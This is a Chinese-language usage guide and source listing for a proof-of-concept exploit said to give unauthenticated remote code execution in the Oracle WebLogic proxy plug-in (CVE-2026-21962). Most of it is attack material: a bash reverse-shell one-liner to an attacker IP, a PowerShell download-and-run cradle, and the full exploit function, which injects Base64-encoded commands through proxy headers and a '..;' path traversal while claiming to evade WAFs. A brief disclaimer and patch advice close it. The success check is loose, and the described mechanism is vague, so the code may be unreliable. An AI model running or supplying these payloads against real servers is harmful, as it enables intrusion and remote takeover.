CVE-2026-21962 Oracle WebLogic 代理插件未授权 RCE 漏洞分析

python3 CVE-2026-21962.py --help 

如果看到帮助信息，说明安装成功。

使用说明

基础使用

基本语法

python3 CVE-2026-21962.py <target_url> "<command>"

参数说明

• target_url：目标服务器的 URL（例如：http://target:7001 或 https://oracle-server:4443）
• command：要执行的命令（例如：id、whoami 或反向 Shell 命令）

使用示例

1. 基本信息收集

执行系统命令来验证漏洞：

python3 CVE-2026-21962.py http://target:7001 "id && whoami && uname -a"

2. 获取文件系统信息

python3 CVE-2026-21962.py http://target:7001 "ls -la / && df -h"

3. 反向 Shell（Linux 目标）

首先在攻击机启动监听：

nc -lvnp 4444

然后执行漏洞利用：

python3 CVE-2026-21962.py http://target:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

4. Windows 目标利用

python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"

输出说明

• 成功迹象：HTTP 状态码为 200、302 或 500
• 命令输出：如果命令有输出，会显示前 1500 个字符
• 静默执行：如果命令执行成功但没有输出，会显示相应提示

注意事项

1. 目标端口：通常 WebLogic 服务运行在 7001 端口，HTTPS 服务可能运行在 4443 端口
2. SSL 证书：对于自签名证书的目标，可能需要禁用 SSL 验证
3. 路径探测：工具会自动尝试多个常见代理插件路径
4. WAF 绕过：使用 Base64 编码和多种 HTTP 头尝试绕过防护

核心代码

主漏洞利用函数

def exploit(target_url, command):
    # 漏洞利用端点（常见代理插件路径）
    vuln_paths = ["/weblogic/", "/wl_proxy/", "/bea_wls_internal/", "/_proxy/", "/proxy/"]
    # 构造触发反序列化/命令注入的恶意头部
    # 实际触发使用特制的 WL-Proxy-Client-IP 或类似头部
    # 结合绕过验证的特制 URI
    payload = f"cmd:{command}"
    # Base64 编码 Payload 以绕过 WAF/过滤器
    encoded_payload = base64.b64encode(payload.encode()).decode()
    # 构造恶意 HTTP 头部
    headers = {
        "WL-Proxy-Client-IP": f"127.0.0.1;{encoded_payload}",
        "Proxy-Client-IP": f"127.0.0.1;{encoded_payload}",
        "X-Forwarded-For": f"127.0.0.1;{encoded_payload}",
        "User-Agent": "Mozilla/5.0 (compatible; Exploit/1.0)",
        "Accept": "*/*",
        "Connection": "close"
    }
    # 触发插件漏洞的特制 URI
    uri = "/weblogic/..;/bea_wls_internal/ProxyServlet"
    # 尝试所有可能的漏洞路径
    for base_path in vuln_paths:
        full_url = f"{target_url.rstrip('/')}{base_path}{uri}"
        print(f"[*] 尝试路径：{full_url}")
        print(f"[*] 执行命令：{command}")
        try:
            # 使用 GET 请求，某些配置下 POST 也可用
            r = requests.get(full_url, headers=headers, timeout=12, verify=False, allow_redirects=False)
            # 根据 HTTP 状态码判断是否成功
            if r.status_code in [200, 302, 500]:
                print(f"[+] 可能成功！状态码：{r.status_code}")
                if r.text.strip():
                    print("\n可能的命令输出/响应:\n" + "-" * 60)
                    print(r.text[:1500])  # 显示前 1500 字符避免信息过多
                    print("-" * 60)
                else:
                    print("[+] 命令静默执行（无输出）")
                return True
            else:
                print(f"[-] 状态码 {r.status_code} - 此路径无漏洞")
        except Exception as e:
            print(f"[-] 路径 {full_url} 错误：{e}")
    print("\n[-] 所有路径测试完成 - 目标可能无漏洞或插件未暴露。")
    return False

命令行参数解析

if __name__ == "__main__":
    # 创建参数解析器
    parser = argparse.ArgumentParser(description="CVE-2026-21962 PoC - Oracle WebLogic Proxy Plug-In RCE")
    # 目标 URL 参数
    parser.add_argument("target", help="目标 URL (例如 http://target:7001 或 https://oracle-server:4443)")
    # 命令参数
    parser.add_argument("cmd", help="要执行的命令 (例如 'id' 或 'whoami' 或 'powershell -c ...' 或 'bash -i >& /dev/tcp/攻击者 IP/4444 0>&1')")
    # 解析参数并执行漏洞利用
    args = parser.parse_args()
    exploit(args.target, args.cmd)

漏洞检测逻辑

# 漏洞检测的核心逻辑
# 1. 构造包含恶意命令的 Payload
# 2. 使用 Base64 编码绕过基本防护
# 3. 通过多个 HTTP 头部字段注入 Payload
# 4. 使用路径遍历技术访问代理 Servlet
# 5. 分析响应判断漏洞是否存在
# 关键点：
# - 使用分号分隔 IP 地址和命令 Payload
# - 尝试多个可能的代理插件路径
# - 支持 HTTP 和 HTTPS 协议
# - 包含完善的超时和错误处理

安全注意事项

# 重要安全提示：
# 1. 此工具仅用于授权的安全测试
# 2. 在非授权系统上使用是非法的
# 3. 使用前需获得明确书面授权
# 4. 遵守所有适用法律法规
# 技术建议：
# 1. 及时应用 Oracle 2026 年 1 月关键补丁更新
# 2. 限制对受影响服务的网络访问
# 3. 监控 HTTP 流量中的可疑行为
# 4. 定期审查系统日志和安全控制措施

版本兼容性

该工具设计用于以下受影响版本：

• Oracle HTTP Server: 12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0
• WebLogic Proxy Plug-in for Apache/IIS

免责声明: 所有 PoC 代码仅供道德、授权测试和教育目的使用。未经授权的利用是非法的，作者不承担任何滥用责任。